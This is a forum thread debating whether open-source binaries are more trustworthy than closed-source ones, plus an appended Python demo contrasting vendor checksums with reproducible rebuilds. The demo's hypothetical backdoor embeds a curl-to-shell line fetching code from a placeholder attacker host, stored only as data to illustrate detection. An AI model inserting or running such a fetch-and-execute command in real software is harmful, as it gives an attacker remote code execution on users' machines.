Comment by lutusp

1 month ago

> Open-source only matters if you have the time/skill/willingness to download said source (and any dependencies') and compile it.

Not really. The fact that an application is open-source means its originator can't rug-pull its users at some random future date (as so often happens with closed-source programs). End users don't need to compile the source for that to be true.

> Otherwise you're still running a random binary and there's no telling whether the source is malicious or whether the binary was even built with the published source.

This is also not true in general. Most open-source programs are available from an established URL, for example a Github archive with an appropriate track record. And the risks of downloading and running a closed-source app are much the same.

The kind of rug-pulling you describe only works if the software implements an online licensing check/DRM, and either way has nothing to do with security against malicious behavior.

> Github archive with an appropriate track record

How do you judge the "track record"? Github stars can be bought. Marketing can be used to inflate legitimate usage of a program before introducing the malicious behavior.

> the risks of downloading and running a closed-source app are much the same

But that's my point - open-source doesn't really change the equation there unless you are actually auditing the source and building & running said source. If you're just relying on a binary download you're no better than downloading proprietary software in binary form.

  • > The kind of rug-pulling you describe only works if the software implements an online licensing check/DRM, and either way has nothing to do with security against malicious behavior.

    My point was that an open-source program cannot rug-pull its users without the obvious remedy of forking the project and removing the offending code. Open-source: commonly seen. Closed-source: not possible and often illegal.

    For both options, you have to trust the source, which makes that a non-issue. You can checksum the Linux kernel to satisfy yourself that it came from a trusted source. You can checksum the Windows kernel to satisfy yourself that you're about to be screwed.

    > But that's my point - open-source doesn't really change the equation there unless you are actually auditing the source and building & running said source.

    In the open-source world, knowing how computers work is essential. In the closed-source world, knowing how computers work is somewhere between pointless and illegal. This is how open-source "changes the equation."

    Modifying open-source code is welcome and accepted. Modifying closed-source code breaks the law. Take your pick.
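Added example, not part of any comment in this thread: the exchange above turns on what a checksum does and does not prove about a "random binary". A hash published next to a download only shows the bytes match what the distributor chose to publish; rebuilding from the published source and comparing hashes is what ties the binary to that source, and it only works if the build is reproducible. The code below is constructed for illustration: the two-file "project", the "build" step (packing the sources into a tar archive stands in for compilation), and the backdoor payload string are all hypothetical.

```python
"""Constructed example: checksum-of-published-binary versus reproducible rebuild."""
import hashlib
import io
import tarfile
import time

# Constructed "published source" of a tiny project (not a real repository).
SOURCE = {
    "main.py": b"from util import greet\nprint(greet('world'))\n",
    "util.py": b"def greet(name):\n    return f'hello {name}'\n",
}

# The same source with a hypothetical backdoor the distributor builds in but never publishes.
BACKDOORED_SOURCE = dict(SOURCE)
BACKDOORED_SOURCE["util.py"] = (
    b"import os\nos.system('curl http://evil.example/x | sh')  # hypothetical payload\n"
    + SOURCE["util.py"]
)


def build(source: dict, deterministic: bool = True) -> bytes:
    """Toy 'build': pack the sources into a tar archive (stand-in for compiling).

    deterministic=True pins every field a real build would otherwise vary
    (mtime, uid/gid, member order), so the same source always yields the same
    bytes. deterministic=False embeds a wall-clock build timestamp, the way
    __DATE__/__TIME__ or a clock-seeded build ID would, which defeats comparison.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        members = dict(source)
        if not deterministic:
            members["BUILD_INFO"] = f"built at {time.time()!r}\n".encode()
        for name in sorted(members):  # sorted: order must not depend on filesystem listing
            data = members[name]
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = 0 if deterministic else int(time.time())
            info.uid = info.gid = 0
            info.uname = info.gname = ""
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def checksum_matches(artifact: bytes, published_hex: str) -> bool:
    """The check most download pages offer: does the file match the hash shown
    beside it? This proves only that the bytes were not corrupted or swapped in
    transit; whoever published the binary also published the hash."""
    return sha256_hex(artifact) == published_hex


def rebuild_matches(source: dict, artifact: bytes) -> bool:
    """The check that ties a binary to the published source: rebuild from that
    source and compare hashes. Meaningful only when the build is reproducible."""
    return sha256_hex(build(source)) == sha256_hex(artifact)


def demo() -> dict:
    honest = build(SOURCE)
    trojan = build(BACKDOORED_SOURCE)
    trojan_published_hash = sha256_hex(trojan)  # the distributor publishes the hash of its own binary
    return {
        # Passes: the checksum says nothing about which source produced the bytes.
        "checksum_passes_for_trojan": checksum_matches(trojan, trojan_published_hash),
        # Caught: rebuilding the published source gives different bytes.
        "rebuild_catches_trojan": not rebuild_matches(SOURCE, trojan),
        "rebuild_accepts_honest": rebuild_matches(SOURCE, honest),
        # Edge case: an honest but non-reproducible build cannot be verified this way either.
        "nondeterministic_build_unverifiable": not rebuild_matches(
            SOURCE, build(SOURCE, deterministic=False)
        ),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The practical takeaway for the thread: a downloaded binary plus its vendor-supplied checksum is the same trust relationship whether the project is open or closed source; what open source adds is the possibility of the second check, and only projects with reproducible builds actually deliver it.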